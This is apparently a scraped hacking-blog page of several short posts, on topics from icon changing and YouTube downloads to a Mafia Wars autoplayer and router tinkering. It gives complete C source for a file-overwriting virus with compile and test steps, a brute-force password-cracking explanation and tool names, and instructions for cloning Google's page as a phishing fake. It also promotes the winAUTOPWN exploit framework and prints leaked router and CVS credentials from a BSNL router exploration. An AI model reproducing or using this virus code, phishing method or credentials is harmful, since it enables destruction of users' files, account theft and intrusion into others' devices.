4. Now the Icon Changer program will open up.
5. Icon changer will search for all the ICONS on your system so that you can select any one of those.
6. Now select the ICON of your choice and click on SET.
7. Now a popup window will appear and ask you to select from either of these two options.
  • Change embeded icon.
  • Adjust Windows to display custom icon.
Select the first option (Change embeded icon).
8. You are done. The ICON get’s changed.

How to Create a Computer Virus?

This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Here’s the source code of the virus program.
 
#include<stdio.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
#include<time.h> FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;
void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}
 

COMPILING METHOD:

 
USING BORLAND TC++ 3.0 (16-BIT):
1. Load the program in the compiler, press Alt-F9 to compile
2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9,THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDIN YOUR COMPILER)
3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE)
4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT)
5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect
 
USING BORLAND C++ 5.5 (32-BIT) :
1. Compile once,note down the generated EXE file length in bytes
2. Change the value of X in source code to this length in bytes
3. Recompile it.The new EXE file is ready to infect
 

HOW TO TEST:

 
1. Open new empty folder
2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER)
3. Run the virus EXE file there you will see all the files in the current directory get infected.
4. All the infected files will be ready to reinfect
That’s it
WARNING: FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD OR MISUSE THIS VIRUS CODE

Brute force Password Cracking explained


Brute force is the best hacking method to an email account  as chances of getting password is very high.The methods is very simple . But this method is cumbersome. Still most hacking software use this method due to high success rate .

This is how you do it. All that you need is the username and findout what is the max password length the software/site allows and also the minimum. say the minimum is 6 and max is 8. You have to start trying out all the combination.First all the six letter combos then seven then 8

aaaaaa

aaaaab

aaaaac

aaaaab

.

.

abaaaa

.

.

azzzzz

baaaaa

.

..

zzzzzz



Now once you do for 6 repeat the same for 7 and then for 8 . You will surely crack it.But the no of combos you need to try is very high.So in most cases you cannot use it but designed software do the job in few minutes. Check crack passwords section for such software's to crack your software/site. This is best used to recover passwords of mobile phone . If use them for hacking,you guys just remember to use strong passwords both upper,lower case and number too to make a strong password usually not below that 9 letter and minizme the chances of getting your account hacked

Here are the two most popular and well known Brute forcers
1.Brutus aet2                 2.Munga Brute force

Hack Adobe Acrobat PDF Password | How to Decrypt Adobe Acrobat PDF Files: Download PDF Decrypter

Hack Adobe Acrobat PDF Password | How to Decrypt Adobe Acrobat PDF Files: Download PDF Decrypter

PDF Decrypter v2.50 | 6MB

PDF Decrypter 2.5 can be used to decrypt the protected Adobe Acrobat PDF files, which have “owner” password set, preventing the file from editing, printing, selecting text and graphics etc. It is the fast, affordable way to decrypt a lot of protected pdf files to decryped pdf files once time for saving your time! Its easy-to-use interface allows you to decrypt PDF files by simply few clicks.

The decrypted file can be opened in any PDF viewer (e.g. Adobe Acrobat Reader). All versions of Adobe Acrobat PDF (including 7.x, which features 128-bit encryption) are supported. And PDF decrypter V2.5 don’t need any software such as adobe acrobat.


PDF Password Cracker: Download PDF Password Remover


The PDF Password Remover can be used to decrypt protected Adobe Acrobat PDF file

The PDF Password Remover is a useful and reliable software which can be used to decrypt protected Adobe Acrobat PDF files, which have "owner" password set, preventing the file from editing (changing), printing, selecting text and graphics.

Decryption is being done instantly. Decrypted file can be opened in any PDF viewer (e.g. Adobe Acrobat Reader) without any restrictions -- i.e. with edit/copy/print functions enabled. All versions of Adobe Acrobat (including 7.x, which features 128-bit encryption) are supported.

The standard security provided by PDF consists of two different methods and two different passwords, 'user password' and 'owner password'.

A PDF document may be protected by password for opening ('user' password) and the document may also specify operations that should be restricted even when the document is decrypted: printing; copying text and graphics out of the document; modifying the document; and adding or modifying text notes and AcroForm fields (using 'owner' password).

Limitation:
Please note that PDF Password Remover doesn't work with documents which have 'user' password (preventing the files from being opened), if both user and owner passwords are unknown the PDF Password Remover will fail.

Here are some key features of "PDF Password Remover":
  • Easy to use
  • Supports drag and drop PDF files
  • Do NOT need Adobe Acrobat software
  • Remove the security settings from your encrypted PDF file is instant
  • Supports command line operation (for manual use or inclusion in scripts)
  • Supports PDF1.6 protocol (formerly only supported by Acrobat 7.0 application)
  • Supports PDF1.6 (Acrobat 7.x) files, including 40-bit RC4 decryption, 128-bit RC4 decryption, compressed files and unencrypted metadata
  • Batch operation on many files from command line
  • Supports Adobe Standard 40-bit Encryption and Adobe Advanced 128-bit Encryption
  • Decrypts protected Adobe Acrobat PDF files, removing restrictions on printing, editing, copying

Download video from youtube with out software






Here is the easiest way to download any video from Youtube.

While playing the video on youtube.com, Copy its location from the address bar like www.youtube.com/watch?v=sasad7657dms2

then add the word ‘kick’ between www. and youtube.com/link…….

EXAMPLE: www.kickyoutube.com/watch?v=sasad7657dms2

That’s it, Download without any other software or going to any other site, as their are many but this method is the best one according to me. Enjoy :)

How To Create Fake Pages


I will give some hacking lessons to budding hackers. This will tell you how to create fake pages. Here is how you create one. Let me show how you do for Google.com.

  • Open Google in a new tab or Click Here .
  • Now select "View" from menubar
  • Then select "Source"(IE) or "Page Source"(firefox).
  • This will show you raw html of the site in a notepad in case of IE. In firefox this will be visible in firefox.
  • Now You need To save this page.
  • Just select "Save page as " . Change save type as to "All Files". and save it as XYZ.html(anyname.html)
  • Now just double click on the html it will open in your browser. You will be get the exact replica of the google page
Only problem is the images are not visible. This is because most sites uses relative path. Just visit the actual page and save all images. Now upload it anywhere on the web. Just get the links of the images. In many cases even the css file(for how sites appear) are also relatve. You need to download them too (just type http:/ /_______._/__.css in the browser and the fill will be downloaded)
Go to the html file and Right click on it and select "OPEN WITH" notepad. Now If you know html job's done in a minute else it will have to use trial and error method.
Relative Path is one thing like this "/images/google.gif" you need to give the complete path names where ever possible like "www.google.com/images/google.gif". In case of images you may even replace these with your links.
Tip for those who dont know html : Html consists of tages image is represented as follows "< img. src="actual image link" /> Click here for Html Tutorials
Similarly change all relative path to actual path and the job done.
Now incase you are planning to use is for wrong purpose the replace path(link/URL) to any thing you want. If you are a hacker or Html programmer then you all ready know about this. But if are newbie to either hacking or html then this is a good exercises. Html programers use This frequently for getting source codes of websites but if use this for hacking you could land behind bar then dont say didn't warn you.

Want More Blog Traffic! Submit Your New Blog Here For Free


When your blog is new the only thing you want is traffic and the most easy, simple, best and successful methods are here mentioned below:
  • Leave a comment at the bottom of this post with your blog’s URL and describe your blog in a short paragraph.
  • Subscribe to my RSS feed (In return, I will help you to boost your traffic).
  • Subscribe to the other blogs’ RSS feeds.
  • Make sure you subscribe to the comments so that you get alerted on every new comment.
  • Do not post as Anonymous user, it will be considered as SPAMMING.
  • Every time a new comment is added, go and visit that blog! Do for others as you would have them do for you.
  • Stumble few posts from your blog.
  • Digg few posts from your blog.
  • Delicious few posts from your blog.
  • Write a post on your own blog about the new blogs you have found and link to them.
  • Write a post on your own blog, link to this post so others can participate and write about the new blogs you have found. Link to them.
Your Participation is must for this to Succeed

If you just submit your link and that all ... then et me clear you that nothing gonna happen.
Spend time visiting the other blogs, commenting and subscribing to their feeds. You will also get some traffic from my readers who have already been blogging for a while.

The more you give, the more you get.

I’d like to encourage my regular readers to spread the link to this post around: This is one of those the-more-the-merrier kinds of things. So please Share this post on Facebook, twitter, myspace, stumble, and bookmark at Delicious

NOTE: My comments are moderated. The following will be deleted or marked as spam
  • Automated blogs or splogs
  • Adult content blogs
  • Content about illegal activities
  • Hate speech
  • Anything that seems suspicious to me

Firefox & Chrome Mafia Wars Autoplayer Script

Firefox & Chrome Mafia Wars Autoplayer Script

Mafia Wars Autoplayer is a script made to work with greasemonkey add-on on your Firefox/Chrome browser.

With the Mafia Wars Autoplayer you will be able to automate doing jobs, harvesting cuban business, deposit money when it reaches certain amount automayically, do fighting, robbing even collect bounty for you, it can also auto purchase inventories for you, probabaly one of the best thing with Mafia Wars Autoplayer is when it does a job, and you don’t have the prerequisite item for that particular job it will automatically go and do the job to try and fill the prerequisite which is great. For those of you that is addicted to Mafia Wars, check it out.

How to use this:
  • Install greasemonkey – CLICK HERE TO INSTALL
  • Install the script – CLICK HERE TO INSTALL SCRIPT
  • On your facebook homepage: Hold Ctrl, then click on your “Mafia Wars” bookmark. This will prevent the application from shrinking into a bar.
  • Alternatively, load mafia wars using this link - CLICK HERE

Google Chrome support!

Video Tutorial on how to use this in Firefox

Downright now - Monitoring if your favorite website is down

Last night when I was at Facebook, suddenly it stopped responding and the server requests just timed out.Downright now - Monitoring if your favorite website is down - theprohack.com I wondered if it was a problem with my ISP or the king of social networking was down at the moment. With nothing to do, I googled and stumbled across Downrightnow , a service that monitors your favorite websites. It compiles the status by combining
  • Reports from users who visit downrightnow
  • Public messages on Twitter from users who are having service trouble
  • Official company announcements and status reports
  • Other third-party web sites that monitor service status
Downright now - Monitoring if your favorite website is down - theprohack.com
As soon as I opened the website, I came to know that Facebook was having some problems at that time
Yep..Facebook was down - theprohack.com
Mission Successful :P I guess you will find it interesting.

winAUTOPWN v2.7 Released - Vulnerability Testing on Windows

winAUTOPWN and bsdAUTOPWN are minimal Interactive Frameworks which act as a frontend for quick systems vulnerability exploitation. It takes inputs like IP address, Hostname, CMS Path, etc. and does a smart multi- threaded portscan for TCP ports 1 to 65535. Exploits capable of giving Remote Shells, which are released publicly over the Internet by active contributors and exploit writers are constantly added to winAUTOPWN/bsdAUTOPWN. A lot of these exploits are written in scripting languages like python, perl and php. Presence of these language interpreters is essential for successful exploitations using winAUTOPWN/bsdAUTOPWN.



Exploits written in languages like C, Delphi, ASM which can be compiled are pre-compiled and added along-with others. On successful exploitation winAUTOPWN/bsdAUTOPWN gives a remote shell and waits for the attacker to use the shell before trying other exploits. This way the attacker can count and check the number of exploits which actually worked on a Target System.

Download

BSNL router hacking and possibility of running custom code over it

Hi all,
I am sorry I have been inactive due to my job, i actually got free this weekend and there we go, i was at home. At home I am having BSNL connection, and for those who dont know what BSNL is, its the AT&amp;T of India, bad service , too much blank spots and connections which flap/drop/disconnect like there is no tomorrow. Worst, I was on my android, trying to get the latest of cyanogen nightlies .  I was frustrated by the services of BSNL. Hence I decided to mess with the router itself. 

BSNL router on closer inspection is manufactured by SemIndia and distributed by ITI. It follows the tracks of using firmware of different routers (Broadcom to be specific, BCM6338 stands for Broadcom router firmware version 96338, deployed in US robotics ones and some other popular routers). mine is DNA-A211-1 , one of most popular ones in India.



and then its just configured accordingly wrt ISP. This time, I left the network part, as i do it all the time in my office with Cisco, focused more on the router and firmware itself.

Warning : 
I am not responsible for getting your router trashed, getting wings and trying to kill you. try on your own risk, I am not responsible for your stupidity.


I didn't had a PC (trashed due to burnt ram), so I have to do everything on my android, so pardon for small screen area, understand my plight. T-netted into Router
(PS : screencaps of android may be a bit distorted as shootme app was not working properly over nightly #120)




the first step was to know what was into it, so typed the usual help.



lots of commands :) ran swversion to get the version and see what was this upto. 
With some hunting , i came to know that "sh" command runs over my router , ran it and voila, familiar interface of busybox snaps in.



great..now thats worth something. My android has it too :)) seeing the version made me tick , it was running an older version of busybox. For those who don't know hat busybox is, its a multicall binary. Tried ls, but it didnt worked, hence tried echo *, listed everything :)


bingo..tried cat /etc/passwd and there we go again.


after that, i thought why not to check what other directories have. got into CVS and got information regarding CVS and pserver, noteworthy one is the credentials of pserver



pserver:sunila@192.168.128.19:/home/cvsroot
not much of an interest as they are of a private LAN, googled to find it was configured by Sunil A, employee at SIEMIndia. Again,opened Repository


SemIndia/Engineering/Products/ADSL2Plus/Integ_Source/targets/fs.src
maybe a private repo at SIEM. neverthless..
moved on to /etc


lots of directories here..as a rule of thumb I opened default.cfg



Generic stuff, but what caught my eye was this 
&amp;amp;amp;amp;lt;ppp_conId1 userName="multiplay" password="bXVsdGlwbGF5"
This might come in handy (use your creativity :)) ) . But then I thought that why not to access the router from web interface. I did it.
Went to management and downloaded the backupsettings.conf file, 




opened it and there we go,



I was not able to find the above credentials in it, hence I came to a conclusion that they must be somewhat of higher privilege level.
Moving on..I thought why not to try to create an arbitrary file . Tried
echo ‘rishrockz’ &amp;amp;amp;amp;gt;&amp;amp;amp;amp;gt; rdx

on every directory (I was not able to determine the file permissions as the version of busybox doesn’t has ls or stat ) Finally came to know that /var is writable. Tried creating a file there
echo ‘rishrockz’ &amp;amp;amp;amp;gt;&amp;amp;amp;amp;gt; rdx
file was created : )))))
and then
cat /var/rdx

: ))))
Congrats, you have run/done it :) )
Now I thought why not to upgrade busybox/upgrade firmware/upload scripts over the router, tried tftp

didn’t worked. Then I checked if the tftp daemon was running as a service, it was. yet somehow I was not able to run it. :(

Strange. I thought forget it (small screen keyboard and android research limitation -&amp;amp;amp;amp;gt; frustration) . Well.. next time I will be thinking of going to compile programs (http://people.debian.org/~debacle/cross/ and copying over them using echo (once I get a PC) , I have got some nice ideas and will be deploying them .
In the mean time, for those who are wondering what this machine has, here is the bootup log.

  1. Observation 1 #  - code can be run over the router , but files must be copied using echo (-ne with append option)  or tftp.  Since busybox is there, we can easily insert a kernel module to be run.
  2. Observation 2# -  the webs directory has a lot of html files, maybe manipulated for xss attacks (i didnt covered it as its not my domain, some better guys can do it)
  3. Observation 3# - private CVS credentials of Siemindia pserver. insider attack ? :D kidding. pserver is already much insecure, but since i have seen a lot of organisations using stock/easily guessable passwords for their outer router/firewalls/vpn servers, its not a tough nut to crack.
  4. Observation 4# (most important) - BSNL SUCKS !

Recommend us on Google!

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More